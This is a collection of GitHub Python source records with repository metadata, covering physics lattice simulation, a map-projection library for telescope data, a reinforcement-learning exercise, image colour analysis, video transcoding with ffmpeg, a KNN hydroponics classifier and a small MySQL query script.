'flat', 'linear', or 'loop' for model type.\")\n model = input(\"Model: \").lower()\n if model in ['linear','loop']:\n print(\"Enter 'NN', 'TL', 'EI', or 'TM' for nearest neighbors, total \" +\n \"lattice density, empty interval, or temperature methods.\")\n else:\n print(\"Enter 'NN', 'TL', or 'EI' for nearest neighbors, total \" +\n \"lattice density, or empty interval methods.\")\n method = input(\"Method: \").upper()\n\n length = int(input(\"Length: \"))\n if model != 'linear' and model != 'loop':\n width = int(input(\"Width: \"))\n else: width = 1\n if model == 'full':\n height = int(input(\"Height: \"))\n else: height = 1\n\n trials = int(input(\"Number of trials: \"))\n if method == 'NN':\n alpha = float(input(\"Alpha value: \"))\n beta = float(input(\"Beta value: \"))\n gamma = float(input(\"Value for gamma: \"))\n mu = r1 = r2 = 0\n k_c = J_c = 1\n elif method == 'TL':\n mu = float(input(\"Mu value: \"))\n gamma = float(input(\"Value for gamma: \"))\n alpha = beta = r1 = r2 = 0\n k_c = J_c = 1\n elif method == 'EI':\n print(\"R1 should be less than R2 for electrostatic models.\")\n r1 = float(input(\"R1 value: \"))\n r2 = float(input(\"R2 value: \"))\n gamma = float(input(\"Value for gamma: \"))\n alpha = beta = mu = 0\n k_c = J_c = 1\n elif method == 'TM':\n print(\"Retrieving temperatures from change_me.py...\")\n choose = input(\"Change k & J values from 1? [Y/N] \").upper()\n if choose == 'Y':\n k_c = float(input(\"k value: \"))\n J_c = float(input(\"J value: \"))\n else: k_c = J_c = 1\n alpha = beta = gamma = mu = r1 = r2 = 0\n else: raise ValueError(\"Method not recognized\")\n start_time = time.time()\n simulate(method, model, length, width, height, alpha, beta, gamma, mu, r1,r2,trials,k_c,J_c)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\nif __name__ == '__main__':\n main()\n","repo_name":"noe98/Cayley","sub_path":"research/latticevol.py","file_name":"latticevol.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"18773907462","text":"import time\n\nimport pandas as pd\n\n\nfrom pyhcomet import cases, price_sets, slates\n\n\ndef test_get_cases():\n res = cases.get_cases()\n assert res is not None\n if len(res) > 0:\n id = res[\"ID\"].iloc[0]\n res = cases.get_case(id)\n assert res is not None\n\n\ndef get_case_template(price_set_id: int, slate_id: int, region: str):\n case_name = f\"test_case_{pd.to_datetime('now', utc=True).strftime('%y%m%d%I%M%S')}\"\n case_name = \"ga_test\"\n template = cases.case_template(\n SimplePriceSetID=price_set_id, SlateID=slate_id, RegionID=region, Name=case_name\n )\n return template\n\n\ndef test_submit_case():\n price_set_id = price_sets.get_price_sets(region_id=\"NWE\")[\"ID\"].iloc[0]\n slate_id = slates.get_slates()[\"ID\"].iloc[0]\n template = get_case_template(\n price_set_id=price_set_id, slate_id=slate_id, region=\"NWE\"\n )\n template[\"Name\"] = \"ga_test\"\n case_id = cases.submit_case(case=template)\n assert case_id is not None\n time.sleep(1)\n res = cases.delete_case(case_id=case_id)\n assert res == \"No Content\"\n","repo_name":"aeorxc/pyhcomet","sub_path":"tests/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4063959813","text":"#!/usr/bin/env python3\n'''Monte Carlo'''\nimport numpy as np\n\n\ndef monte_carlo(env, V, policy, episodes=5000, max_steps=100,\n alpha=0.1, gamma=0.99):\n '''performs the Monte Carlo algorithm:\n\n Args:\n env is the openAI environment instance\n V is a numpy.ndarray of shape (s,) containing the value estimate\n policy is a function that takes in a state and returns the next action\n to take\n episodes is the total number of episodes to train over\n max_steps is the maximum number of steps per episode\n alpha is the learning rate\n gamma is the discount rate\n\n Returns: V, the updated value estimate\n '''\n\n states = V.shape[0]\n\n for i in range(episodes):\n s = env.reset()\n list_episodes = []\n\n for j in range(max_steps):\n action = policy(s)\n new, reward, done, info = env.step(action)\n list_episodes.append([s, action, reward, new])\n if done:\n break\n s = new\n episode = np.array(list_episodes, dtype=int)\n G = 0\n\n for j, step in enumerate(episode[::-1]):\n s, action, reward, s_next = step\n G = gamma * G + reward\n\n if s not in episode[:i, 0]:\n V[s] = V[s] + alpha * (G - V[s])\n\n return V\n","repo_name":"gcifuentess/holbertonschool-machine_learning","sub_path":"reinforcement_learning/0x02-temporal_difference/0-monte_carlo.py","file_name":"0-monte_carlo.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37535097122","text":"from PIL import Image, ImageOps\nimport numpy as np\nfrom skimage import color\nimport matplotlib.pyplot as plt\nimport cv2 as cv\n\ndef rgb2lab_show(path):\n im = Image.open(path).convert('RGB')\n # im = ImageOps.grayscale(im)\n im = np.array(im)\n # im = np.tile(im, (3, 1, 1)).transpose(1, 2, 0)\n lab = color.rgb2lab(im).astype(np.float32)\n L = lab[..., 0]\n A = lab[..., 1]\n B = lab[..., 2]\n fig, axes = plt.subplots(1, 4, figsize=(12, 4))\n axes = axes.reshape(-1)\n for ax, img in zip(axes, [L, A, B]):\n ax.hist(img.reshape(-1), bins=256)\n # ax.imshow(img, cmap='gray')\n # ax.set_axis_off()\n # axes[3].hist(L.reshape(-1), bins=256)\n plt.show()\n\nif __name__ == '__main__':\n rgb2lab_show('10001570.jpg')\n # rgb2lab_show('20220428181759721.png')\n","repo_name":"kigane/SyncFile","sub_path":"Tool/rgb2lab_show.py","file_name":"rgb2lab_show.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39147986222","text":"import json\nimport os\nimport danmaku2ass\nimport sys\n\n\nffmpeg = 'ffmpeg\\\\ffmpeg.exe'\nfontsize = 50\n\ndef FindAllVideo(file_root):\n videolist = []\n for root, dirs, files in os.walk(file_root, topdown=False):\n for name in files:\n if name == 'entry.json':\n with open(os.path.join(root, name), 'r', encoding='utf-8') as f:\n videoinfo = json.loads(f.read())\n title = videoinfo['title'].replace(' ','').replace('\\\\','-').replace('/','-')\n videofile = root + r'\\80\\video.m4s'\n audiofile = root + r'\\80\\audio.m4s'\n danmufile = root + r'\\danmaku.xml'\n if os.path.isfile(videofile) and os.path.isfile(audiofile):\n onevideo = {'videofile': videofile, 'audiofile': audiofile, 'title': title,\n 'width': videoinfo['page_data']['width'], 'height': videoinfo['page_data']['height']}\n if os.path.isfile(danmufile):\n onevideo['danmu'] = danmufile\n videolist.append(onevideo)\n return videolist\n\n\ndef CodeVideo(videolist, outputdir, codetype='.mp4'):\n if outputdir[-1] != '\\\\':\n outputdir += '\\\\'\n if codetype[0] != '.':\n codetype = '.'+ codetype\n for onevideo in videolist:\n title = onevideo['title']\n # 处理弹幕\n if 'danmu' in onevideo:\n try:\n danmaku2ass.Danmaku2ASS(input_format='Bilibili',input_files=onevideo['danmu'], output_file=outputdir + title + '.ass',\n stage_width=onevideo['width'], stage_height=onevideo['height'],\n reserve_blank=480,\n font_size=fontsize, text_opacity=0.6, duration_marquee=12.0, duration_still=6.0)\n except Exception as e:\n return '错误[弹幕转换失败]因为:\\n' + str(e)\n # 处理视频\n # ffmpeg -i video2.avi -i audio.mp3 -vcodec copy -acodec copy output.avi\n cmd = r'.\\\"%s\" -i \"%s\" -i \"%s\" -vcodec copy -acodec copy \"%s\"' % (\n ffmpeg, onevideo['videofile'], onevideo['audiofile'], outputdir + title + codetype)\n os.system(cmd)\n #res = os.popen(cmd)\n return '编码完成'\n\nif __name__ == '__main__':\n CodeVideo(FindAllVideo(r'\\\\Desktop\\\\新建文件夹'), '\\\\Desktop\\\\新建文件夹\\\\75801774')\n","repo_name":"yushao123/BilibiliTranscoding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"32428245237","text":"import so3g.proj\nimport numpy as np\nimport scipy\nfrom pixell import enmap, tilemap\n\nfrom .helpers import _get_csl, _valid_arg, _not_both\nfrom . import helpers\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass P:\n \"\"\"Projection Matrix.\n\n This class provides functions to apply a Projection Matrix (or its\n transpose). The Projection Matrix, P, also sometimes called the\n Pointing Matrix, describes how a vector of time-ordered\n measurements d are determined by a vector of map pixels m::\n\n d = P m\n\n We are working in aspace, of course, where d is not a vector, but\n rather an array of vectors, and m is not a vector, it's a\n multi-dimensional array with two of the dimensions corresponding\n to a rectangular pixelization of the sky.\n\n If you are making filter+bin maps, you will want to use these functions:\n\n - to_map\n - to_inverse_weights\n - remove_weights\n\n If you are solving for a map iteratively you will probably just need:\n\n - to_map\n - from_map\n\n Important keyword arguments that are used in many functions:\n\n - tod: The AxisManager from which signal and pointing information\n should be taken.\n - signal: The array to use for time-ordered signal. If a string,\n it will be looked up in tod. Defaults to 'signal'.\n - det_weights: A vector of floats representing the inverse\n variance of each detector, under the assumption of white noise.\n - cuts: A RangesMatrix that identifies samples that should be\n excluded from projection operations.\n - comps: the component code (e.g. 'T', 'TQU', 'QU', ...) that\n specifies the spin-components being modeled in the map.\n - dest: the appropriately shaped array in which to place the\n computed result (as an alternative to allocating a new object to\n store the result).\n\n Note that in the case of det_weights and cuts, the Projection\n Matrix may also have cached values for those. It is an error to\n pass either of these as a keyword argument to a projection routine\n if a value has been cached for it.\n\n Objects of this class cache certain pre-computed information (such\n as the rotation taking boresight coordinates to celestial\n coordinates) and certain context-dependent settings (such as a map\n shape, WCS, and spin-component configuration). You may want to\n inspect or borrow these results, perhaps to reuse them when\n constructing new instances with slight modifications. The cached\n attributes are:\n\n - sight: A CelestialSightLine, representing the boresight pointing\n in celestial coordinates. [samps]\n - fp: G3VectorQuat representing the focal plane offsets of each\n detector. [dets]\n - geom: The target map geometry. This is a pixell.enmap.Geometry\n object, with attributes .shape and .wcs; or possibly (if tiled)\n a pixell.tilemap.TileGeometry.\n - comps: String indicating the spin-components to include in maps.\n E.g., 'T', 'QU', 'TQU'.\n - rot: quat giving an additional fixed rotation to apply to get\n from boresight to celestial coordinates. Not for long...\n - cuts (optional): RangesMatrix indicating what samples to exclude\n from projection operations (the indicated samples have\n projection matrix element 0 in all components). [dets, samps]\n - threads (optional): RangesMatrix that assigns ranges of samples\n to specific threads. This is necessary for TOD-to-map\n operations that use OpenMP. [dets, samps]\n - det_weights (optional): weights (one per detector) to apply to\n time-ordered data when binning a map (and also when binning a\n weights matrix). [dets]\n - interpol (optional): How to interpolate the values for samples\n between pixel centers. Forwarded to Projectionist. Valid\n options are:\n\n - None, 'nn' or 'nearest': Standard nearest neighbor mapmaking.\n - 'lin' or 'bilinear': Linearly interpolate between the four\n closest pixels.\n\n Default: None\n\n These things can be updated freely, with the following caveats:\n\n - If the number of \"samples\" or \"detectors\" is changed in one\n attribute, it will need to be changed in the others to match.\n - The threads attribute, if in use, needs to be recomputed if\n anything about the pointing changes (this includes map geometry\n but does not include map components).\n\n Setting the \"threads\" argument to certain special values will\n activate different thread assignment algorithms:\n\n - False: do not use threading; to_map projections will be\n single-threaded.\n - True: use the default algorithm, 'domdir'.\n - None: same as True.\n - 'simple': compute self.threads using simple map-stripe\n algorithm.\n - 'domdir': compute self.threads using dominant-direction\n algorithm (recommended).\n - 'tiles': for tiled geometries, design self.threads such that\n each tile is assigned to a single thread (each thread may be in\n charge of multiple tiles).\n\n \"\"\"\n def __init__(self, sight=None, fp=None, geom=None, comps='T',\n cuts=None, threads=None, det_weights=None, interpol=None):\n self.sight = sight\n self.fp = fp\n self.geom = wrap_geom(geom)\n self.comps = comps\n self.cuts = cuts\n self.threads = threads\n self.active_tiles = None\n self.det_weights = det_weights\n self.interpol = interpol\n\n @classmethod\n def for_tod(cls, tod, sight=None, fp=None, geom=None, comps='T',\n rot=None, cuts=None, threads=None, det_weights=None,\n timestamps=None, focal_plane=None, boresight=None,\n boresight_equ=None, wcs_kernel=None, weather='typical',\n site='so', interpol=None):\n \"\"\"Set up a Projection Matrix for a TOD. This will ultimately call\n the main P constructor, but some missing arguments will be\n extracted from tod and computed along the way.\n\n To determine the boresight pointing in celestial coordinates\n (ultimately passed to constructor as sight=), the first\n non-None item in the following list is used:\n\n - the sight= keyword argument.\n - the boresight_equ= keyword argument.\n - the boresight= keyword argument\n - tod.get('boresight_equ')\n - tod.get('boresight')\n\n If the map geometry geom is not specified, but the wcs_kernel\n is provided, then get_footprint will be called to determine\n the geom.\n\n \"\"\"\n\n if sight is None:\n if boresight_equ is None:\n if boresight is None:\n boresight_equ = tod.get('boresight_equ')\n if boresight_equ is not None:\n sight = so3g.proj.CelestialSightLine.for_lonlat(\n boresight_equ.ra, boresight_equ.dec, boresight_equ.get('psi'))\n else:\n timestamps = _valid_arg(timestamps, 'timestamps', src=tod)\n boresight = _valid_arg(boresight, 'boresight', src=tod)\n assert(boresight is not None)\n sight = so3g.proj.CelestialSightLine.az_el(\n timestamps, boresight.az, boresight.el, roll=boresight.roll,\n site=site, weather=weather)\n else:\n sight = _get_csl(sight)\n\n # Apply a rotation from equatorial to map WCS coordinates.\n if rot is not None:\n sight.Q = rot * sight.Q\n\n # Set up the detectors in the focalplane\n fp = _valid_arg(focal_plane, 'focal_plane', src=tod)\n fp = so3g.proj.quat.rotation_xieta(fp.xi, fp.eta, fp.get('gamma'))\n\n if geom is None and wcs_kernel is not None:\n geom = helpers.get_footprint(tod, wcs_kernel, sight=sight)\n\n return cls(sight=sight, fp=fp, geom=geom, comps=comps,\n cuts=cuts, threads=threads, det_weights=det_weights,\n interpol=interpol)\n\n @classmethod\n def for_geom(cls, tod, geom, comps='TQU', timestamps=None,\n focal_plane=None, boresight=None, rot=None, cuts=None):\n \"\"\"Deprecated, use .for_tod.\"\"\"\n return cls.for_tod(tod, geom=geom, comps=comps,\n timestamps=timestamps, focal_plane=focal_plane,\n boresight=boresight, rot=rot, cuts=cuts)\n\n def zeros(self, super_shape=None, comps=None):\n \"\"\"Returns an enmap concordant with this object's configured geometry\n and component count.\n\n Args:\n super_shape (tuple): The leading dimensions of the array.\n If None, self._comp_count(comps) is used.\n comps: The component list, to override self.comps.\n\n Returns:\n An enmap with shape super_shape + self.geom.shape.\n\n \"\"\"\n if super_shape is None:\n super_shape = (self._comp_count(comps), )\n if self.tiled:\n # Need to fully resolve tiling to get occupied tiles.\n proj, _ = self._get_proj_threads()\n return tilemap.from_tiles(proj.zeros(super_shape), self.geom)\n else:\n proj = self._get_proj()\n return enmap.ndmap(proj.zeros(super_shape), wcs=self.geom.wcs)\n\n def to_map(self, tod=None, dest=None, comps=None, signal=None,\n det_weights=None, cuts=None, eigentol=None):\n \"\"\"Project time-ordered signal into a map. This performs the operation\n\n m += P d\n\n and returns m.\n\n Args:\n tod: AxisManager; possible source for 'signal', 'det_weights'.\n dest (enmap): the map or array into which the data should be\n accumulated. (If None, a new enmap is created and\n initialized to zero.)\n signal: The time-ordered data, d. If None, tod.signal is used.\n det_weights: The per-detector weight vector. If None,\n self.det_weights will be used; if that is not set then\n uniform weights of 1 are applied.\n cuts: Sample cuts to exclude from processing. If None,\n self.cuts is used.\n eigentol: This is ignored.\n\n \"\"\"\n signal = _valid_arg(signal, 'signal', src=tod)\n det_weights = _not_both(det_weights, self.det_weights,\n 'det_weights', dtype='float32')\n cuts = _not_both(cuts, self.cuts, 'cuts')\n\n if comps is None: comps = self.comps\n if dest is None: dest = self.zeros(comps=comps)\n\n proj, threads = self._get_proj_threads(cuts=cuts)\n proj.to_map(signal, self._get_asm(), output=self._prepare_map(dest),\n det_weights=det_weights, comps=comps, threads=unwrap_ranges(threads))\n return dest\n\n def to_weights(self, tod=None, dest=None, comps=None, signal=None,\n det_weights=None, cuts=None):\n \"\"\"Computes the weights matrix for the uncorrelated noise model and\n returns it. I.e.:\n\n W += P N^-1 P^T\n\n and returns W. Here the inverse noise covariance has shape\n (n_dets), and carries a single weight (1/var) value for each\n detector.\n\n Args:\n tod (AxisManager): possible source for det_weights.\n dest (enmap): the map or array into which the weights should\n be accumulated. (If None, a new enmap is created and\n initialized to zero.)\n det_weights: The per-detector weight vector. If None,\n tod.det_weights will be used; if that is not set then\n uniform weights of 1 are applied.\n cuts: Sample cuts to exclude from processing. If None,\n self.cuts is used.\n\n \"\"\"\n det_weights = _not_both(det_weights, self.det_weights,\n 'det_weights', dtype='float32')\n cuts = _not_both(cuts, self.cuts, 'cuts')\n\n if comps is None:\n comps = self.comps\n if dest is None:\n _n = self._comp_count(comps)\n dest = self.zeros((_n, _n))\n\n proj, threads = self._get_proj_threads(cuts=cuts)\n proj.to_weights(self._get_asm(), output=self._prepare_map(dest),\n det_weights=det_weights, comps=comps, threads=unwrap_ranges(threads))\n return dest\n\n def to_inverse_weights(self, weights_map=None, tod=None, dest=None,\n comps=None, signal=None, det_weights=None, cuts=None,\n eigentol=1e-4,\n ):\n \"\"\"Compute an inverse weights map, W^-1, from a weights map. If no\n weights_map is passed in, it will be computed by calling\n to_weights, passing through all other arguments.\n\n \"\"\"\n if weights_map is None:\n logger.info('to_inverse_weights: calling .to_weights')\n weights_map = self.to_weights(\n tod=tod, comps=comps, signal=signal, det_weights=det_weights, cuts=cuts)\n\n # Works for both normal and tiled maps\n if dest is None: dest = np.zeros_like(weights_map)\n dest[:] = helpers._invert_weights_map(weights_map, eigentol=eigentol, UPLO='U')\n return dest\n\n def remove_weights(self, signal_map=None, weights_map=None, inverse_weights_map=None,\n dest=None, **kwargs):\n \"\"\"Apply the inverse weights matrix to a signal map.\n\n m' = W^-1 m\n\n If W or m are not fully specified, they will be computed by\n calling other routines inline, with relevant arguments passed\n through.\n\n Args:\n signal_map: The map m to filter.\n inverse_weights_map: the matrix W^-1 to apply to the map.\n Shape should be (n_comp, n_comp, n_row, n_col), but only\n the upper diagonal in the first two dimensions needs to be\n populated. If this is None, then \"weights_map\" is taken\n as W, and it will be inverted and applied.\n weights_map: the matrix W. Shape should be (n_comp, n_comp,\n n_row, n_col), but only the upper diagonal in the first\n two dimensions needs to be populated. If this is None,\n then W will be computed by a call to\n\n \"\"\"\n if inverse_weights_map is None:\n inverse_weights_map = self.to_inverse_weights(weights_map=weights_map, **kwargs)\n if signal_map is None:\n signal_map = self.to_map(**kwargs)\n\n if dest is None: dest = np.zeros_like(signal_map)\n dest[:] = helpers._apply_inverse_weights_map(inverse_weights_map, signal_map)\n return dest\n\n def from_map(self, signal_map, dest=None, comps=None, wrap=None,\n cuts=None, tod=None):\n \"\"\"Project from a map into the time-domain.\n\n d += P m\n\n Args:\n signal_map: The map m. This can probably be just about\n anything supported by so3g.proj; it doesn't have to match\n the internally configured geometry.\n dest: Time-ordered data array, shape (dets, samps). If\n None, a new array will be created to hold the result.\n Otherwise, data are *accumulated* into d, so clear it\n manually if you are trying to do d = P m.\n comps (str): Projection components, if you want to override.\n cuts: RangesMatrix, shape (dets, samps) flagging samples\n that should not be populated. Defaults to empty.\n wrap (str): If specified, wraps the result as tod[wrap]\n (after removing whatever was in there).\n\n Returns:\n The dest array.\n\n Notes:\n Since this is a set of one-to-many operation, OpenMP can\n be used without carefully assigning samples to threads.\n\n \"\"\"\n assert cuts is None # whoops, not implemented.\n\n proj = self._get_proj()\n if comps is None:\n comps = self.comps\n tod_shape = (len(self.fp), len(self.sight.Q))\n if dest is None:\n dest = np.zeros(tod_shape, np.float32)\n assert(dest.shape == tod_shape) # P.fp/P.sight and dest argument disagree\n proj.from_map(self._prepare_map(signal_map), self._get_asm(), signal=dest, comps=comps)\n\n if wrap is not None:\n if wrap in tod:\n del tod[wrap]\n tod.wrap(wrap, dest, [(0, 'dets'), (1, 'samps')])\n\n return dest\n\n @property\n def tiled(self):\n \"\"\"Duck-typing to see if we're tiled or not. Reload-safe, unlike isinstance\"\"\"\n try:\n self.geom.ntile\n return True\n except AttributeError:\n return False\n\n def _comp_count(self, comps=None):\n \"\"\"Returns the number of spin components for component code comps.\n\n \"\"\"\n if comps is None:\n comps = self.comps\n return len(comps)\n\n def _get_proj(self):\n if self.geom is None:\n raise ValueError(\"Can't project without a geometry!\")\n # Backwards compatibility for old so3g\n interpol_kw = _get_interpol_args(self.interpol)\n if self.tiled:\n return so3g.proj.Projectionist.for_tiled(\n self.geom.shape, self.geom.wcs, self.geom.tile_shape,\n active_tiles=self.active_tiles, **interpol_kw)\n else:\n return so3g.proj.Projectionist.for_geom(self.geom.shape,\n self.geom.wcs, **interpol_kw)\n\n def _get_proj_threads(self, cuts=None):\n \"\"\"Return the Projectionist and sample-thread assignment for the\n present geometry. If the thread assignment has not been\n determined yet, it is done now and cached in self.threads. In\n tiled geometries, if self.active_tiles has not been\n determined, that is done now and cached.\n\n The returned sample-thread assignment is modified by \"cuts\",\n which defaults to self.cuts if passed as None. I.e. after\n computing or looking up the full self.threads, the code\n returns (proj, self.threads*~cuts).\n\n Returns:\n Tuple (proj, threads*cuts).\n\n \"\"\"\n proj = self._get_proj()\n if cuts is None:\n cuts = self.cuts\n\n if self.tiled and self.active_tiles is None:\n logger.info('_get_proj_threads: get_active_tiles')\n if isinstance(self.threads, str) and self.threads == 'tiles':\n logger.info('_get_proj_threads: assigning using \"tiles\"')\n tile_info = proj.get_active_tiles(self._get_asm(), assign=True)\n _tile_threads = wrap_ranges(tile_info['group_ranges'])\n else:\n tile_info = proj.get_active_tiles(self._get_asm())\n self.active_tiles = tile_info['active_tiles']\n proj = self._get_proj()\n\n if self.threads is False:\n return proj, ~cuts\n if self.threads is None:\n self.threads = 'domdir'\n if isinstance(self.threads, str):\n if self.threads in ['simple', 'domdir']:\n logger.info(f'_get_proj_threads: assigning using \"{self.threads}\"')\n self.threads = wrap_ranges(proj.assign_threads(\n self._get_asm(), method=self.threads))\n elif self.threads == 'tiles':\n # Computed above unless logic failed us...\n self.threads = _thile_threads\n else:\n raise ValueError('Request for unknown algo threads=\"%s\"' % self.threads)\n if cuts:\n threads = self.threads * ~cuts\n else:\n threads = self.threads\n return proj, threads\n\n def _get_asm(self):\n \"\"\"Bundles self.fp and self.sight into an \"Assembly\" for calling\n so3g.proj routines.\"\"\"\n so3g_fp = so3g.proj.FocalPlane()\n for i, q in enumerate(self.fp):\n so3g_fp[f'a{i}'] = q\n return so3g.proj.Assembly.attach(self.sight, so3g_fp)\n\n def _prepare_map(self, map):\n if self.tiled: return map.tiles\n else: return map\n\nclass P_PrecompDebug:\n def __init__(self, geom, pixels, phases):\n self.geom = wrap_geom(geom).nopre\n self.pixels = pixels\n self.phases = phases\n def zeros(self, super_shape=None):\n if super_shape is None: super_shape = (self.phases.shape[2],)\n return enmap.zeros(super_shape + self.geom.shape, self.geom.wcs)\n def to_map(self, dest=None, signal=None, comps=None):\n if dest is None: dest = self.zeros()\n proj = so3g.ProjEng_Precomp_NonTiled()\n proj.to_map(dest, self.pixels, self.phases, signal, None, None)\n return dest\n def from_map(self, signal_map, dest=None, comps=None):\n if dest is None: dest = np.zeros(self.pixels.shape[:2], np.float32)\n proj = so3g.ProjEng_Precomp_NonTiled()\n proj.from_map(signal_map, self.pixels, self.phases, dest)\n return dest\n\ndef wrap_geom(geom):\n if isinstance(geom, tuple) or isinstance(geom, list):\n return enmap.Geometry(*geom)\n else:\n return geom\n\n# Helpers for backwards compatibility with old so3g. Consider removing these\n# once transition is done.\ndef wrap_ranges(ranges):\n if _so3g_ivals_format() == 1:\n return so3g.proj.ranges.RangesMatrix([ranges])\n else:\n return ranges\n\ndef unwrap_ranges(ranges):\n if _so3g_ivals_format() == 1:\n assert len(ranges) == 1, \"Old so3g only supports simple (1-bunch) thread ranges, but got thread ranges with shape %s\" % (str(ranges.shape))\n return ranges[0]\n else:\n return ranges\n\ndef _so3g_ivals_format():\n projclass = so3g.proj.Projectionist\n if not hasattr(projclass, '_ivals_format'):\n return 1\n else:\n return projclass._ivals_format\n\ndef _get_interpol_args(interpol):\n if _so3g_ivals_format() >= 2:\n return {'interpol': interpol}\n assert interpol in [None, \"nn\", \"nearest\"], \"Old so3g does not support interpolated mapmaking\"\n return {}\n","repo_name":"simonsobs/sotodlib","sub_path":"sotodlib/coords/pmat.py","file_name":"pmat.py","file_ext":"py","file_size_in_byte":21855,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"3553214957","text":"# Importing libraries\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport time\nimport sklearn\nfrom sklearn.utils import shuffle\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import classification_report, plot_confusion_matrix\nimport matplotlib.pyplot as plt\n\n# Reading CSV datasets\nacc_df = pd.read_csv(\"MOCK_DATA.csv\")\nacc_df.fillna(0, inplace=True)\nacc_df['Acceptable'] = True\nunacc_df = pd.read_csv(\"MOCK_DATA-1.csv\")\nunacc_df.fillna(0, inplace=True)\nunacc_df['Acceptable'] = False\ndf = acc_df.append(unacc_df, ignore_index=True)\nshuffle(df)\n\n# Separating into features and labels\nX = df.loc[:, df.columns != 'Acceptable']\ny = df.loc[:, df.columns == 'Acceptable']\n\nstart1 = time.time()\nbestAcc = 0\n# Training the best model using pickle and for loop\nfor _ in range(1000):\n\n # Separating training and testing set\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size=0.2, random_state=1)\n\n # Scaling features\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train.astype(np.float32))\n X_test = scaler.transform(X_test.astype(np.float32))\n\n # Training KNN model\n model = KNeighborsClassifier(n_neighbors=9)\n model.fit(X_train, y_train.values.ravel())\n acc = model.score(X_test, y_test.values.ravel())\n print(str(_) + \" Accuracy: \" + str(acc))\n if acc > bestAcc:\n bestAcc = acc\n with open(\"bestModel.pickle\", \"wb\") as f:\n pickle.dump(model, f)\nstop1 = time.time()\n\n# Loading best model\npickle_in = open(\"bestModel.pickle\", \"rb\")\nmodel = pickle.load(pickle_in)\n\n# Classification report and model accuracy\ny_pred = model.predict(X_test)\nclassification_report = classification_report(y_test, y_pred)\naccuracy = model.score(X_test, y_test)\nprint()\nprint(\"CLASSIFICATION REPORT\")\nprint(classification_report)\nprint(f\"MODEL ACCURACY: {round(bestAcc * 100, 2)}%\")\nprint()\nprint(f\"TRAINING TIME: {round(stop1 - start1, 2)}s\")\ndisp = plot_confusion_matrix(model, X_test, y_test)\nprint(disp)\nplt.show()\n\n# Getting user input\npH_level = float(input('Input pH Level: '))\nec_level = float(input('Input EC Level: '))\narea_of_lettuce = float(input('Input Area of Lettuce: '))\n\n# Preprocessing user input\ninputs = [[pH_level, ec_level, area_of_lettuce]]\nnew_inputs = scaler.transform(inputs)\nnew_inputs = pd.DataFrame(new_inputs, columns=(df.columns[0:3]))\n\n# Predicting from user input\nstart2 = time.time()\npred = model.predict(new_inputs)\nstop2 = time.time()\nprint()\nprint(f\"INPUTS: pH Level = {pH_level}, EC Level = {ec_level}, Area of Lettuce = {area_of_lettuce}\")\nprint(f\"PREDICTION: ACCEPTABLE = {pred}\")\nprint(f\"PREDICTION TIME: {start2 - stop2} s\")\nif pred:\n print()\n print(\"ACTION: CLOSE VALVE\")\nelse:\n print()\n print(\"ACTION: OPEN VALVE\")\n\n# Getting new CSV file\nfilename = str(input(\"Input CSV File Name: \"))\nnew_df = pd.read_csv(filename)\nnew_df.fillna(0, inplace=True)\n\n# Predicting acceptable values from CSV file\narr1 = []\narr2 = []\nfor i in new_df.index:\n pH_level = new_df['pH_level'][i]\n ec_level = new_df['ec_level'][i]\n area_of_lettuce = new_df['area_of_lettuce'][i]\n temp_df = scaler.transform([[pH_level, ec_level, area_of_lettuce]])\n temp_df = pd.DataFrame(temp_df, columns=df.columns[0:3])\n pred = model.predict(temp_df)\n arr1.append(pred)\n if pred:\n arr2.append('CLOSE VALVE')\n else:\n arr2.append('OPEN VALVE')\narr1 = pd.DataFrame(arr1)\narr2 = pd.DataFrame(arr2)\nnew_df['Acceptable'] = arr1\nnew_df['Action'] = arr2\nprint(new_df)","repo_name":"johnrivera0987/Hydroponics-KNN","sub_path":"Hydroponics-KNN.py","file_name":"Hydroponics-KNN.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34166751750","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/1/24 14:57\n# @Author : LiangJiangHao\n# @Software: PyCharm\nimport pymysql\nimport datetime\n\nclass biliTable(object):\n def __init__(self):\n self.client =pymysql.Connect(\n host='127.0.0.1',\n port=3306,\n user='root',\n passwd='123456',\n db='bili',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor\n\n )\n self.cur = self.client.cursor()\n def selectStr(self):\n sql='select * from bili limit 10000 '\n self.cur.execute(sql)\n dataArr=self.cur.fetchall()\n # print(dataArr)\n return dataArr\n\nnow_time = datetime.datetime.now()\nprint(now_time)\n\nbili=biliTable()\ndataArr=bili.selectStr()\n#\nprint(len(dataArr))\n\nnew_time = datetime.datetime.now()\nprint(new_time-now_time)\n# n_1kw=0\n# n_2kw=0\n# n_3kw=0\n# n_4kw=0\n# n_error=0\n# for video in dataArr:\n# url=video['videoUrl']\n# aid=url.split('aid=')[1]\n# print(aid)\n# if int(aid)<10000000:\n# n_1kw+=1\n# elif int(aid)<20000000:\n# n_2kw+=1\n# elif int(aid)<30000000:\n# n_3kw+=1\n# elif int(aid)<40000000:\n# n_4kw+=1\n# else:\n# n_error+=1\n# resultStr='n_1kw=%s,n_2kw=%s,n_3kw=%s,n_4kw=%s,n_error=%s'%(n_1kw,n_2kw,n_3kw,n_4kw,n_error)\n# 